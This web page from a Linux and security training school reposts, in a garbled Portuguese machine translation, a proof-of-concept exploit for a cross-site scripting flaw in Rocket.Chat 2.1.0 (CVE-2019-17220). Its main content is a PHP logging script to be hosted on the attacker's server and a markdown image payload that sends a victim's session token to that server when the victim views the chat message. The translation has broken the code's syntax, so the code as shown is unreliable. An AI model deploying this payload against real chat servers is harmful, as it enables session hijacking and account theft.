Linux Force Security Cursos de linux e segurança da informação
Portal do Aluno

Rocket.Chat 2.1.0 – Cross-Site Scripting

Rocket.Chat 2.1.0 – Cross-Site Scripting

# Title: Rocket.Chat 2.1.0 – Script entre sites
# Autor: 3H34N
# Data: 2019-10-22
# Produto: Rocket.Chat
# Fornecedor: https://rocket.chat/
# Versões vulneráveis: Rocket.Chat <2.1.0
# CVE: CVE-2019-17220
# Agradecimentos especiais: Ali razmjoo, Mohammad Reza Espargham (@rezesp)

# PoC
# 1. Crie l33t.php em um servidor web

<? php
$ output = fopen (“logs.txt”, “a +”) ou die (“WTF? o.O”);
$ leet = $ _GET [‘leet’]. “\ n \ n”;
fwrite ($ output, $ leet);
fclose ($ output);
?>

# 2. Abra uma sessão de bate-papo
# 3. Envie carga útil com o URL do servidor da web

! [title] (http: //10.10.1.5/l33t.php? leet = + `{} token`)

# 4. O token será gravado em logs.txt quando o destino visualizar sua mensagem.

Categorias
Compartilhe esse post

Posts populares

Invista no seu futuro com nossos cursos!

Garanta já a sua vaga.
Linux Force Security Cursos de linux e segurança da informação

Escola especializada em Linux, Segurança da Informação e DevOps. São Paulo – SP

Instagram Facebook X-twitter

Inscreva-se para receber novidades e promoções!

Cursos Linux

Cursos de Segurança

Cursos de DevOps

Institucional

Conteúdos

Fale Conosco

© 2011 – 2025 Linux Force Security – Todos os direitos reservados | Desenvolvido por Cooder Tecnologia

Linux Force Security Cursos de linux e segurança da informação

Seu futuro na tecnologia começa agora! Não deixe essa chance escapar.

Voltar para o site